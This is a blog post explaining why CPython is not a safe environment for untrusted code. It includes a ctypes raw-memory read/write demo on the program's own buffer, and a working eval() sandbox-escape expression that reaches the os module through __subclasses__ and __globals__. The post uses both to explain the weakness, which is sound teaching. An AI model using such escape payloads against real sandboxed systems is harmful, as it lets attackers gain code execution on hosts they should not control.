CPython's trust of bytecode is not a security problem

October 22, 2015

Yesterday I wrote about how CPython trusts bytecode so much that you can use it to read or write arbitrary memory. In comments, Ewen McNeil had a typical reaction to this:

It appears this means if you can get arbitrary Python execution (eg, unwisely trusting YAML, XML, pickle, etc...), then you can probably get arbitrary memory read/write in the Python process, which is a fairly short step away from arbitrary assembly code execution.

This is true, but it also misunderstands the security situation of Python bytecode. Even without this issue, it is game over in general if an attacker can load arbitrary bytecode into your Python process. The obvious weakness is that ctypes is part of the standard library these days, and it gives you this level of access to memory without any need to corrupt the bytecode interpreter. But even without ctypes, an attacker has plenty of ways to achieve binary code execution. They can transfer a binary, write it out, and then execute it. They can transfer a native-code Python module (in .so form), manipulate the Python load path, and then import it (which gets them code execution inside the Python process itself). They can run other existing vulnerable binaries on your system and exploit their bugs. And so on.
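To give a feel for how little effort the ctypes route takes, here is a minimal sketch. The helper names peek() and poke() are made up for illustration, and the address used is one the program allocated itself so that the example is safe to run; nothing in ctypes checks that the integer you hand it points at memory you are supposed to touch.

```python
import ctypes


def peek(address: int, length: int) -> bytes:
    """Read `length` raw bytes starting at an integer memory address."""
    return ctypes.string_at(address, length)


def poke(address: int, data: bytes) -> None:
    """Overwrite memory at an integer address with `data`."""
    ctypes.memmove(address, data, len(data))


# Use a buffer we own so that the demonstration cannot corrupt anything.
buf = ctypes.create_string_buffer(b"hello world")
addr = ctypes.addressof(buf)  # a plain int from here on

before = peek(addr, 5)
poke(addr, b"J")
after = peek(addr, 5)

print(hex(addr), before, after)
```

The point is that once you have addr as an ordinary integer, the same two calls work on any other integer too, and a bad one simply crashes or corrupts the process.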

You can certainly try to stop this by creating a Python environment that blocks access to the Python features necessary for this. The problem is that there have proven to be many features that can be exploited to help here and many paths through Python to reach them. The runtime environment of Python is a complex, intertangled thing, and all attackers need is one crack that lets them bootstrap a reference to, say, the os module. And there are a lot of potential cracks.
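One well-known example of such a crack, sketched under the assumption of a naive sandbox that runs eval() with an empty __builtins__: even with no builtins at all, an expression can walk from an empty tuple up to object, list every class loaded in the process, and borrow the global namespace of some ordinary Python-level __init__ method. The names SANDBOX_GLOBALS and PAYLOAD are mine, and exactly which class gets hit first depends on what the process has imported.

```python
import os  # the host program has os loaded, as almost every program does

# A naive "sandbox": no builtins at all, so no __import__, open, getattr, etc.
SANDBOX_GLOBALS = {"__builtins__": {}}

# The direct approach really is blocked.
try:
    eval("__import__('os')", dict(SANDBOX_GLOBALS))
    direct_import_blocked = False
except NameError:
    direct_import_blocked = True

# But () -> tuple -> object -> every loaded class is still reachable.
# Any class with an __init__ written in Python exposes its module globals,
# and a module that imported sys hands us sys.modules, and thus os.
PAYLOAD = (
    "[c.__init__.__globals__['sys'].modules['os'] "
    "for c in ().__class__.__base__.__subclasses__() "
    "if c.__init__.__class__.__name__ == 'function' "
    "and 'sys' in c.__init__.__globals__][0]"
)

leaked = eval(PAYLOAD, dict(SANDBOX_GLOBALS))

print("direct import blocked:", direct_import_blocked)
print("got the real os module anyway:", leaked is os)
```

Blocking this particular path (for example by filtering out double-underscore attribute names) just moves the search to the next one, which is the real problem.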

(Python used to have a restricted execution module, rexec. It was disabled in Python 2.3 because it had basically unfixable holes.)

The simple truth is that Python is not a safe execution environment for untrusted code. The only important thing about bytecode being able to read and write arbitrary memory all by itself is that it shows how impossible the job of securing CPython is. Even if you managed to reliably cut off all access to modules and code that could be used to escape your sandbox at the Python level, you would still have to audit and fix the innards of the bytecode interpreter itself to be safe.

This is why I say that this trust of bytecode is not a security problem; it doesn't really make the situation any worse than it already is. It's just an amusingly baroque alternate path to a security issue that is already there in general.


Comments on this page:

By Jeremy at 2015-10-22 12:35:49:

That restricted execution mode seems like roughly the same thing as Java's java.security.AccessController and permissions system. Except Java still delusionally believes that that approach is feasible.

By John Wiersba at 2015-10-23 13:19:28:

I wonder about Safe Tcl and whether or not it can avoid some of the problems you refer to?



Last modified: Thu Oct 22 00:12:41 2015